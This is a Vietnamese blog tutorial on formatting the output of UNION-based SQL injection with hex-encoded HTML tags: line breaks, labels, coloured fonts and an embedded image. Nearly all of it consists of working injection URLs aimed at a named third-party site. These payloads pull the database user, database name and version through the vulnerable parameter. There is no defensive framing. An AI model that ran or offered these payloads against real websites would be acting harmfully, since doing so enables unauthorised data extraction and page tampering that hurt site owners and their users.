Thêm code HTML khi thực hiện SQL injection

Thêm code HTML khi thực hiện SQL injection, HTML khi thực hiện SQL injection, Cách thêm HTML khi thực hiện SQL injection, Hướng dẫn chèn thêm code HTML khi thực hiện SQL injection

Trong hướng dẫn này mystown sẽ chỉ cho bạn cách để thêm các thẻ HTML đơn giản và cách thiết kế trong các truy vấn SQL Injection của bạn

1. Thêm thẻ<br>

Thẻ<br> được sử dụng khi bạn muốn kết thúc một dòng nhưng lại không muốn bắt đầu một đoạn văn khác. Thẻ<br> sẽ tạo ra một lần xuống dòng khi bạn viết nó

Chúng ta nhìn câu lệnh trước khi thêm thẻ <br> :


1http://www.epaint.com/index.php?id=5&nid=-41 union select 1,2,CONCAT(user(),0x3a3a,database(),0x3a3a,version()),4-- -


Thêm thẻ<br> vào (nhớ chuyển <br> sang mã hex)
1http://www.epaint.com/index.php?id=5&nid=-41 union select 1,2,CONCAT(user(),0x3c62723e,database(),0x3c62723e,version()),4-- -


3c62723e: là mã<br> đã chuyển sang dạng mã hex
Chúng ta nhìn thấy có sự khác biệt rõ ràng

2. Tạo chú thích
Trong ví dụ này mình sẽ chú thích cho các phần user, database, version

Mã unhex:
1http://www.epaint.com/index.php?id=5&nid=-41 union select 1,2,CONCAT(0xUSER>>,user(),0x3c62723e,0xDB>>,database(),0x3c62723e,0xVersion>>,version()),4-- -
Mã hex:
1http://www.epaint.com/index.php?id=5&nid=-41 union select 1,2,CONCAT(0x555345523e3e,user(),0x3c62723e,0x44423e3e,database(),0x3c62723e,0x56657273696f6e3e3e,version()),4-- -
Kết quả

3. Tạo chữ màu
Mã unhex:
1http://www.epaint.com/index.php?id=5&nid=-41 union select 1,2,CONCAT(0x<font size="4" color="green">,0xUSER>>,user(),0x</font>,0x<br>,0x<font size="4" color="red">,0xDB>>,database(),0x</font>,0x<br>,0x<font size="4" color="blue">,0xVersion>>,version(),0x</font>),4-- -


Mã hex:
1http://www.epaint.com/index.php?id=5&nid=-41 union select 1,2,CONCAT(0x3c666f6e742073697a653d22342220636f6c6f723d22677265656e223e,0x555345523e3e,user(),0x3c2f666f6e743e,0x3c62723e,0x3c666f6e742073697a653d22342220636f6c6f723d22726564223e,0x44423e3e,database(),0x3c2f666f6e743e,0x3c62723e,0x3c666f6e742073697a653d22342220636f6c6f723d22626c7565223e,0x56657273696f6e3e3e,version(),0x3c2f666f6e743e),4-- -


Kết quả

4. Thêm hình ảnh trong SQLi
1<img src="link hình">

Mã unhex
1http://www.epaint.com/index.php?id=5&nid=-41 union select 1,2,0x<img src='http://vitaku.com/wp-content/uploads/2014/01/12Uzumaki-Naruto.jpg'>,4-- -

Mã hex

1http://www.epaint.com/index.php?id=5&nid=-41 union select 1,2,0x3c696d67207372633d27687474703a2f2f766974616b752e636f6d2f77702d636f6e74656e742f75706c6f6164732f323031342f30312f3132557a756d616b692d4e617275746f2e6a7067273e,4-- -

Tìm Kiếm Google :

  • Thêm code HTML khi thực hiện SQL injection
  •  HTML khi thực hiện SQL injection
  • Hướng dẫn chèn thêm code HTML khi thực hiện SQL injection

Nhãn :
Đăng Bởi :
Bình Luận

Đăng ký:Đăng Nhận xét (Atom)
Chat
1